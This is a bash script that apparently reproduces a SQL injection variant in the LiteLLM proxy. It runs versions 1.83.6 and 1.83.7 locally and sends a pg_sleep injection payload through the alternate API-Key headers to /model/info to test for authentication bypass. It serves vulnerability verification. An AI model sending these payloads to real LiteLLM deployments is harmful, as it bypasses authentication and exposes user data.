#!/bin/bash
set -euo pipefail

# Portable paths - works from any directory
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs/vuln_variant"
VARIANT_DIR="$ROOT/vuln_variant"
mkdir -p "$LOGS" "$VARIANT_DIR"

cd "$ROOT"

MAIN_LOG="$LOGS/reproduction_steps.log"
: > "$MAIN_LOG"
exec > >(tee -a "$MAIN_LOG") 2>&1

RESULT="no_bypass"
SERVICE_STARTED=false
HEALTHCHECK_PASSED=false
TARGET_REACHED=false
VULN_APIKEY_OK=false
FIXED_APIKEY_BYPASS=false
VULN_XLITELLM_OK=false
FIXED_XLITELLM_BYPASS=false
PG_PORT=""
PGDATA=""
CACHE_DIR="$ROOT/vuln_variant/litellm-cache"
REPO="$CACHE_DIR/repo"
CONFIG="$CACHE_DIR/litellm_variant_config.yaml"

find_free_port() {
    python3 - <<'PY'
import socket
s = socket.socket()
s.bind(("127.0.0.1", 0))
print(s.getsockname()[1])
s.close()
PY
}

load_cache_context() {
    if [[ -f "$ROOT/project_cache_context.json" ]] && jq -e '.prepared == true and (.project_cache_dir|type == "string")' "$ROOT/project_cache_context.json" >/dev/null 2>&1; then
        CACHE_DIR="$(jq -r '.project_cache_dir' "$ROOT/project_cache_context.json")"
        REPO="$CACHE_DIR/repo"
    fi
    mkdir -p "$CACHE_DIR" "$CACHE_DIR/venvs"
    CONFIG="$CACHE_DIR/litellm_variant_config.yaml"
    echo "[+] Cache directory: $CACHE_DIR"
}

stop_proxy_by_log() {
    local log="$1"
    if [[ -f "$log.pid" ]]; then
        local pid
        pid="$(cat "$log.pid" 2>/dev/null || true)"
        if [[ -n "$pid" ]]; then
            kill "$pid" 2>/dev/null || true
            sleep 2
            kill -9 "$pid" 2>/dev/null || true
        fi
        rm -f "$log.pid"
    fi
}

write_runtime_manifest() {
    python3 - "$VARIANT_DIR" "$SERVICE_STARTED" "$HEALTHCHECK_PASSED" "$TARGET_REACHED" "$RESULT" <<'PY'
import json, os, sys
variant_dir, service_started, healthcheck_passed, target_reached, result = sys.argv[1:6]
root = os.path.dirname(variant_dir)
artifacts = [
    "logs/vuln_variant/reproduction_steps.log",
    "logs/vuln_variant/fixed_version.txt",
    "logs/vuln_variant/source_delta_variant.txt",
    "logs/vuln_variant/postgres_variant.log",
    "logs/vuln_variant/vulnerable_api_key_header.txt",
    "logs/vuln_variant/fixed_api_key_header.txt",
    "logs/vuln_variant/vulnerable_x_litellm_header.txt",
    "logs/vuln_variant/fixed_x_litellm_header.txt",
    "vuln_variant/result.json",
]
manifest = {
    "entrypoint_kind": "endpoint",
    "entrypoint_detail": "GET /model/info authenticated with alternate API-Key and x-litellm-api-key headers instead of Authorization Bearer",
    "service_started": service_started == "true",
    "healthcheck_passed": healthcheck_passed == "true",
    "target_path_reached": target_reached == "true",
    "runtime_stack": ["postgresql", "litellm-proxy"],
    "variant_stage_result": result,
    "proof_artifacts": [p for p in artifacts if os.path.exists(os.path.join(root, p))],
    "notes": "The alternate header sources reach the same combined_view token lookup in the vulnerable package, but the fixed package parameterizes that sink, so no fixed-version bypass is confirmed.",
}
with open(os.path.join(variant_dir, "runtime_manifest.json"), "w", encoding="utf-8") as f:
    json.dump(manifest, f, indent=2)
print("[+] Wrote runtime manifest")
print(json.dumps(manifest, indent=2))
PY
}

cleanup() {
    set +e
    stop_proxy_by_log "$LOGS/proxy_vulnerable_variant.log"
    stop_proxy_by_log "$LOGS/proxy_fixed_variant.log"
    if [[ -n "${PG_BIN:-}" && -n "${PGDATA:-}" && -f "$PGDATA/postmaster.pid" ]]; then
        PATH="$PG_BIN:$PATH" pg_ctl -D "$PGDATA" stop -m fast >/dev/null 2>&1 || true
    fi
    if [[ -n "${PGDATA:-}" && -f "$PGDATA/log" ]]; then
        cp "$PGDATA/log" "$LOGS/postgres_variant.log" 2>/dev/null || true
    fi
    write_runtime_manifest
}
trap cleanup EXIT

ensure_repo() {
    if [[ -d "$REPO/.git" ]]; then
        echo "[+] Reusing LiteLLM checkout at $REPO"
    else
        echo "[+] Cloning LiteLLM repository for patch/source identity inspection"
        rm -rf "$REPO"
        local mirror=""
        if [[ -f "$ROOT/project_cache_context.json" ]]; then
            mirror="$(jq -r '.repo_mirror_dir // empty' "$ROOT/project_cache_context.json" 2>/dev/null || true)"
        fi
        if [[ -n "$mirror" && -d "$mirror/litellm.git" ]]; then
            git clone "$mirror/litellm.git" "$REPO"
        else
            git clone https://github.com/BerriAI/litellm.git "$REPO"
        fi
    fi
    {
        echo "variant_stage_source_identity"
        echo "vulnerable_tag=v1.83.6-nightly"
        git -C "$REPO" rev-list -n 1 v1.83.6-nightly 2>/dev/null || true
        echo "fixed_tag=v1.83.7-stable"
        git -C "$REPO" rev-list -n 1 v1.83.7-stable 2>/dev/null || true
        echo "fixed_security_commit=4dc416ee749122ca91e3bca095217478663419e7"
        git -C "$REPO" show --format=fuller --no-patch 4dc416ee749122ca91e3bca095217478663419e7 2>/dev/null || true
        echo
        git -C "$REPO" diff 4dc416ee749122ca91e3bca095217478663419e7^ 4dc416ee749122ca91e3bca095217478663419e7 -- litellm/proxy/utils.py | sed -n '1,160p' || true
    } > "$LOGS/source_delta_variant.txt"
    {
        echo "tested_fixed_package=litellm==1.83.7"
        echo "fixed_release_tag=v1.83.7-stable"
        echo "fixed_release_tag_commit=$(git -C "$REPO" rev-list -n 1 v1.83.7-stable 2>/dev/null || true)"
        echo "fixed_security_commit=4dc416ee749122ca91e3bca095217478663419e7"
        echo "latest_inspected_repo_head=$(git -C "$REPO" rev-parse HEAD 2>/dev/null || true)"
    } > "$LOGS/fixed_version.txt"
}

find_postgres_bin() {
    local bin=""
    bin="$(pg_config --bindir 2>/dev/null || true)"
    if [[ -z "$bin" || ! -x "$bin/initdb" ]]; then
        for d in /usr/lib/postgresql/*/bin; do
            if [[ -x "$d/initdb" ]]; then bin="$d"; break; fi
        done
    fi
    echo "$bin"
}

ensure_postgres() {
    PG_BIN="$(find_postgres_bin)"
    if [[ -z "$PG_BIN" || ! -x "$PG_BIN/initdb" ]]; then
        echo "[+] Installing PostgreSQL server packages"
        sudo apt-get update -qq
        sudo apt-get install -y -qq postgresql postgresql-client
        PG_BIN="$(find_postgres_bin)"
    fi
    if [[ -z "$PG_BIN" || ! -x "$PG_BIN/initdb" ]]; then
        echo "[-] PostgreSQL initdb was not found"
        exit 2
    fi
    export PATH="$PG_BIN:$PATH"
    echo "[+] PostgreSQL binaries: $PG_BIN"
}

setup_postgres() {
    PGDATA="$CACHE_DIR/pglitellm_variant"
    PG_PORT="$(find_free_port)"
    local db_user="${USER:-$(whoami)}"
    [[ -f "$PGDATA/postmaster.pid" ]] && pg_ctl -D "$PGDATA" stop -m fast >/dev/null 2>&1 || true
    if [[ ! -f "$PGDATA/PG_VERSION" ]]; then
        echo "[+] Initializing PostgreSQL data directory $PGDATA"
        rm -rf "$PGDATA"
        initdb -D "$PGDATA" -U "$db_user" --no-locale --encoding=UTF8 >/dev/null
    fi
    sed -i "/^port = /d;/^listen_addresses = /d;/^log_statement = /d;/^log_min_duration_statement = /d;/^unix_socket_directories = /d" "$PGDATA/postgresql.conf" 2>/dev/null || true
    {
        echo "listen_addresses = '127.0.0.1'"
        echo "port = $PG_PORT"
        echo "log_statement = 'all'"
        echo "log_min_duration_statement = 0"
        echo "unix_socket_directories = '$PGDATA'"
    } >> "$PGDATA/postgresql.conf"
    : > "$PGDATA/log"
    echo "[+] Starting PostgreSQL on 127.0.0.1:$PG_PORT"
    pg_ctl -D "$PGDATA" -l "$PGDATA/log" start >/dev/null
    for i in {1..30}; do
        if psql -h 127.0.0.1 -p "$PG_PORT" -U "$db_user" -d postgres -c "SELECT 1" >/dev/null 2>&1; then
            echo "[+] PostgreSQL is ready"
            break
        fi
        sleep 1
        [[ "$i" == 30 ]] && { echo "[-] PostgreSQL did not become ready"; exit 2; }
    done
    for db in litellm_variant_vuln litellm_variant_fixed; do
        if psql -h 127.0.0.1 -p "$PG_PORT" -U "$db_user" -d postgres -Atc "SELECT 1 FROM pg_database WHERE datname='$db'" | grep -q 1; then
            echo "[+] Reusing database $db"
        else
            createdb -h 127.0.0.1 -p "$PG_PORT" -U "$db_user" "$db"
            echo "[+] Created database $db"
        fi
    done
}

ensure_python_venv_support() {
    if python3 -m venv "$VARIANT_DIR/venv_probe" >/dev/null 2>&1; then
        rm -rf "$VARIANT_DIR/venv_probe"
        return
    fi
    echo "[+] Installing python3-venv"
    sudo apt-get update -qq
    sudo apt-get install -y -qq python3-venv
}

install_venv() {
    local version="$1"
    local venv="$2"
    if [[ -x "$venv/bin/python" ]] && "$venv/bin/python" - <<PY >/dev/null 2>&1
import importlib.metadata as m
assert m.version('litellm') == '$version'
import fastapi, uvicorn, prisma
PY
    then
        echo "[+] Reusing venv $(basename "$venv") with litellm==$version"
        return
    fi
    echo "[+] Creating venv $(basename "$venv") with litellm==$version"
    rm -rf "$venv"
    python3 -m venv "$venv"
    "$venv/bin/pip" install -q --upgrade pip setuptools wheel
    "$venv/bin/pip" install -q "litellm==$version" orjson
    "$venv/bin/pip" install -q --no-cache-dir \
        websockets fastapi uvicorn python-multipart PyJWT apscheduler \
        backoff boto3 cryptography pyyaml rich rq gunicorn mcp \
        email_validator fastapi_sso litellm-proxy-extras pynacl \
        azure-identity azure-storage-blob polars pyroscope-io soundfile \
        uvloop "prisma==0.11.0"
}

generate_and_push_schema() {
    local venv="$1"
    local db="$2"
    local schema db_user
    schema="$(find "$venv" -path '*/site-packages/litellm/proxy/schema.prisma' -print -quit)"
    db_user="${USER:-$(whoami)}"
    export DATABASE_URL="postgresql://$db_user@127.0.0.1:$PG_PORT/$db"
    # Ensure the Prisma client exists, but avoid a slow db push if the target table is already present.
    if psql -h 127.0.0.1 -p "$PG_PORT" -U "$db_user" -d "$db" -Atc "SELECT to_regclass('\"LiteLLM_VerificationToken\"')" 2>/dev/null | grep -q 'LiteLLM_VerificationToken'; then
        echo "[+] Prisma schema already present in $db"
    else
        echo "[+] Generating and pushing Prisma schema to $db"
        PATH="$venv/bin:$PATH" "$venv/bin/prisma" generate --schema "$schema" >/dev/null
        PATH="$venv/bin:$PATH" timeout 180 "$venv/bin/prisma" db push --schema "$schema" --accept-data-loss >/dev/null
    fi
    psql -h 127.0.0.1 -p "$PG_PORT" -U "$db_user" -d "$db" -c 'DELETE FROM "LiteLLM_VerificationToken";' >/dev/null 2>&1 || true
}

write_config() {
    cat > "$CONFIG" <<'YAML'
model_list:
  - model_name: gpt-4o
    litellm_params:
      model: openai/gpt-4o
      api_key: os.environ/OPENAI_API_KEY

general_settings:
  disable_prisma_schema_update: true
YAML
}

start_proxy() {
    local venv="$1" db="$2" log="$3" port_var="$4"
    local port db_user schema_dir
    db_user="${USER:-$(whoami)}"
    port="$(find_free_port)"
    schema_dir="$(find "$venv" -path '*/site-packages/litellm/proxy' -type d -print -quit)"
    : > "$log"
    echo "[+] Starting LiteLLM $("$venv/bin/python" -c 'import importlib.metadata as m; print(m.version("litellm"))') on 127.0.0.1:$port using DB $db"
    (
        export PATH="$venv/bin:$PATH"
        export PYTHONOPTIMIZE=1
        export PYTHONUNBUFFERED=1
        export DATABASE_URL="postgresql://$db_user@127.0.0.1:$PG_PORT/$db"
        export LITELLM_MASTER_KEY="sk-variant-master-key"
        export OPENAI_API_KEY="sk-variant-fake-openai"
        cd "$schema_dir"
        exec stdbuf -oL -eL litellm --config "$CONFIG" --host 127.0.0.1 --port "$port" > "$log" 2>&1
    ) &
    echo $! > "$log.pid"
    SERVICE_STARTED=true
    printf -v "$port_var" '%s' "$port"
}

wait_for_proxy() {
    local port="$1" log="$2"
    echo -n "[+] Waiting for LiteLLM proxy on port $port"
    for _ in {1..180}; do
        local code
        code="$(curl -s -o /dev/null -w "%{http_code}" "http://127.0.0.1:$port/health" --max-time 2 2>/dev/null || true)"
        if [[ -n "$code" && "$code" != "000" ]]; then
            echo " ready (HTTP $code)"
            HEALTHCHECK_PASSED=true
            return
        fi
        if grep -q "Application startup complete" "$log" 2>/dev/null; then
            echo " ready (startup log observed)"
            HEALTHCHECK_PASSED=true
            return
        fi
        sleep 1
        echo -n "."
    done
    echo " timeout"
    tail -120 "$log" || true
    exit 2
}

seed_key() {
    local port="$1" outfile="$2"
    echo "[+] Creating one valid virtual key through the running proxy"
    curl -sS -X POST "http://127.0.0.1:$port/key/generate" \
        -H "Authorization: Bearer sk-variant-master-key" \
        -H "Content-Type: application/json" \
        -d '{"models":["gpt-4o"],"metadata":{"purpose":"pruva-sqli-variant"}}' \
        --max-time 20 \
        -o "$outfile"
    python3 -m json.tool "$outfile" >/dev/null
    jq -e '.key and .token' "$outfile" >/dev/null
}

request_model_info_with_header() {
    local port="$1" header_name="$2" token="$3" outfile="$4"
    local metrics
    metrics="$(curl -sS -w "%{time_total},%{http_code}" \
        "http://127.0.0.1:$port/model/info" \
        -H "$header_name: $token" \
        --max-time 20 \
        -o "$outfile" 2>/dev/null || true)"
    echo "${metrics:-0,000}"
}

assert_package_delta() {
    local venv_vuln="$1" venv_fixed="$2"
    local vuln_utils fixed_utils fixed_spend
    vuln_utils="$(find "$venv_vuln" -path '*/site-packages/litellm/proxy/utils.py' -print -quit)"
    fixed_utils="$(find "$venv_fixed" -path '*/site-packages/litellm/proxy/utils.py' -print -quit)"
    fixed_spend="$(find "$venv_fixed" -path '*/site-packages/litellm/proxy/spend_tracking/spend_management_endpoints.py' -print -quit)"
    grep -q "WHERE v.token = '{token}'" "$vuln_utils" || { echo "[-] Vulnerable package does not contain raw combined_view token lookup"; exit 2; }
    grep -q 'WHERE v.token = \$1' "$fixed_utils" || { echo "[-] Fixed package does not contain parameterized combined_view token lookup"; exit 2; }
    grep -q 'valid_sort_fields' "$fixed_spend" || { echo "[-] Fixed spend log sort validation was not observed"; exit 2; }
    echo "[+] Verified package delta and sort validation guardrails"
}

run_attempts() {
    local venv_vuln="$1" venv_fixed="$2"
    local payload_api="' OR EXISTS(SELECT 1 FROM pg_sleep(2)) -- api-key"
    local payload_x="' OR EXISTS(SELECT 1 FROM pg_sleep(2)) -- x-litellm"
    local vuln_port fixed_port

    assert_package_delta "$venv_vuln" "$venv_fixed"

    start_proxy "$venv_vuln" "litellm_variant_vuln" "$LOGS/proxy_vulnerable_variant.log" vuln_port
    wait_for_proxy "$vuln_port" "$LOGS/proxy_vulnerable_variant.log"
    seed_key "$vuln_port" "$LOGS/vulnerable_variant_key_generate.json"

    echo "[+] Candidate A: SQL payload supplied in API-Key header to vulnerable /model/info"
    local m
    m="$(request_model_info_with_header "$vuln_port" "API-Key" "$payload_api" "$LOGS/vulnerable_api_key_header.txt")"
    local vuln_api_time="${m%,*}" vuln_api_code="${m#*,}"
    echo "[+] Vulnerable API-Key candidate: time=${vuln_api_time}s status=${vuln_api_code}"

    echo "[+] Candidate B: SQL payload supplied in x-litellm-api-key header to vulnerable /model/info"
    m="$(request_model_info_with_header "$vuln_port" "x-litellm-api-key" "$payload_x" "$LOGS/vulnerable_x_litellm_header.txt")"
    local vuln_x_time="${m%,*}" vuln_x_code="${m#*,}"
    echo "[+] Vulnerable x-litellm-api-key candidate: time=${vuln_x_time}s status=${vuln_x_code}"
    stop_proxy_by_log "$LOGS/proxy_vulnerable_variant.log"
    sleep 2

    start_proxy "$venv_fixed" "litellm_variant_fixed" "$LOGS/proxy_fixed_variant.log" fixed_port
    wait_for_proxy "$fixed_port" "$LOGS/proxy_fixed_variant.log"
    seed_key "$fixed_port" "$LOGS/fixed_variant_key_generate.json"

    echo "[+] Fixed check A: identical API-Key payload against fixed /model/info"
    m="$(request_model_info_with_header "$fixed_port" "API-Key" "$payload_api" "$LOGS/fixed_api_key_header.txt")"
    local fixed_api_time="${m%,*}" fixed_api_code="${m#*,}"
    echo "[+] Fixed API-Key candidate: time=${fixed_api_time}s status=${fixed_api_code}"

    echo "[+] Fixed check B: identical x-litellm-api-key payload against fixed /model/info"
    m="$(request_model_info_with_header "$fixed_port" "x-litellm-api-key" "$payload_x" "$LOGS/fixed_x_litellm_header.txt")"
    local fixed_x_time="${m%,*}" fixed_x_code="${m#*,}"
    echo "[+] Fixed x-litellm-api-key candidate: time=${fixed_x_time}s status=${fixed_x_code}"
    stop_proxy_by_log "$LOGS/proxy_fixed_variant.log"

    cp "$PGDATA/log" "$LOGS/postgres_variant.log" 2>/dev/null || true

    python3 - "$VARIANT_DIR" "$LOGS" "$vuln_api_time" "$vuln_api_code" "$vuln_x_time" "$vuln_x_code" "$fixed_api_time" "$fixed_api_code" "$fixed_x_time" "$fixed_x_code" <<'PY'
import json, os, sys
variant_dir, logs = sys.argv[1:3]
vat, vac, vxt, vxc, fat, fac, fxt, fxc = sys.argv[3:11]
vat, vxt, fat, fxt = map(float, (vat, vxt, fat, fxt))
with open(os.path.join(logs, "vulnerable_api_key_header.txt"), encoding="utf-8", errors="replace") as f:
    vuln_api_body = f.read()
with open(os.path.join(logs, "vulnerable_x_litellm_header.txt"), encoding="utf-8", errors="replace") as f:
    vuln_x_body = f.read()
with open(os.path.join(logs, "fixed_api_key_header.txt"), encoding="utf-8", errors="replace") as f:
    fixed_api_body = f.read()
with open(os.path.join(logs, "fixed_x_litellm_header.txt"), encoding="utf-8", errors="replace") as f:
    fixed_x_body = f.read()
with open(os.path.join(logs, "postgres_variant.log"), encoding="utf-8", errors="replace") as f:
    pglog = f.read()
checks = {
    "vulnerable_api_key_header_delayed": vat >= 1.7,
    "vulnerable_api_key_header_auth_bypassed": vac == "200" and '"data"' in vuln_api_body,
    "vulnerable_x_litellm_header_delayed": vxt >= 1.7,
    "vulnerable_x_litellm_header_auth_bypassed": vxc == "200" and '"data"' in vuln_x_body,
    "fixed_api_key_header_rejected": fac == "401" and "token_not_found_in_db" in fixed_api_body,
    "fixed_api_key_header_not_delayed": fat < 1.5,
    "fixed_x_litellm_header_rejected": fxc == "401" and "token_not_found_in_db" in fixed_x_body,
    "fixed_x_litellm_header_not_delayed": fxt < 1.5,
    "postgres_saw_injected_sleep_in_vulnerable_query": "pg_sleep(2)" in pglog and "-- api-key" in pglog and "-- x-litellm" in pglog and "WHERE v.token = '' OR EXISTS" in pglog,
    "postgres_saw_fixed_parameterized_lookup": "WHERE v.token = $1" in pglog and "-- api-key" in pglog and "-- x-litellm" in pglog,
}
result = {
    "result": "alternate_trigger_blocked_by_fix",
    "exit_code_meaning": "exit 1 because the alternate header triggers work only on the vulnerable package and do not bypass the fixed package",
    "payloads": {"api_key_header": "' OR EXISTS(SELECT 1 FROM pg_sleep(2)) -- api-key", "x_litellm_api_key_header": "' OR EXISTS(SELECT 1 FROM pg_sleep(2)) -- x-litellm"},
    "vulnerable_api_key_header": {"time_seconds": vat, "http_code": vac},
    "vulnerable_x_litellm_header": {"time_seconds": vxt, "http_code": vxc},
    "fixed_api_key_header": {"time_seconds": fat, "http_code": fac},
    "fixed_x_litellm_header": {"time_seconds": fxt, "http_code": fxc},
    "checks": checks,
}
with open(os.path.join(variant_dir, "result.json"), "w", encoding="utf-8") as f:
    json.dump(result, f, indent=2)
print(json.dumps(result, indent=2))
if not all(checks.values()):
    sys.exit(2)
PY
    VULN_APIKEY_OK=true
    VULN_XLITELLM_OK=true
    FIXED_APIKEY_BYPASS=false
    FIXED_XLITELLM_BYPASS=false
    TARGET_REACHED=true
    RESULT="alternate_trigger_blocked_by_fix"
}

main() {
    echo "[+] LiteLLM SQL injection variant analysis: alternate authentication header sources"
    echo "[+] This script tests vulnerable litellm==1.83.6 and fixed litellm==1.83.7 side by side."
    load_cache_context
    ensure_repo
    ensure_postgres
    setup_postgres
    ensure_python_venv_support
    local venv_vuln="$CACHE_DIR/venvs/litellm_vuln_1_83_6"
    local venv_fixed="$CACHE_DIR/venvs/litellm_fixed_1_83_7"
    install_venv "1.83.6" "$venv_vuln"
    install_venv "1.83.7" "$venv_fixed"
    # Schemas are generated/pushed lazily only when missing. Prior timed runs may
    # leave query-engine processes, so this step is deliberately before proxy startup.
    generate_and_push_schema "$venv_vuln" "litellm_variant_vuln"
    generate_and_push_schema "$venv_fixed" "litellm_variant_fixed"
    write_config
    run_attempts "$venv_vuln" "$venv_fixed"
    echo "[+] Variant stage completed: alternate header triggers are blocked by the fixed version; no fixed-version bypass confirmed."
    # Exit 1 is intentional per stage contract: no bypass reproduced on fixed package.
    exit 1
}

main "$@"
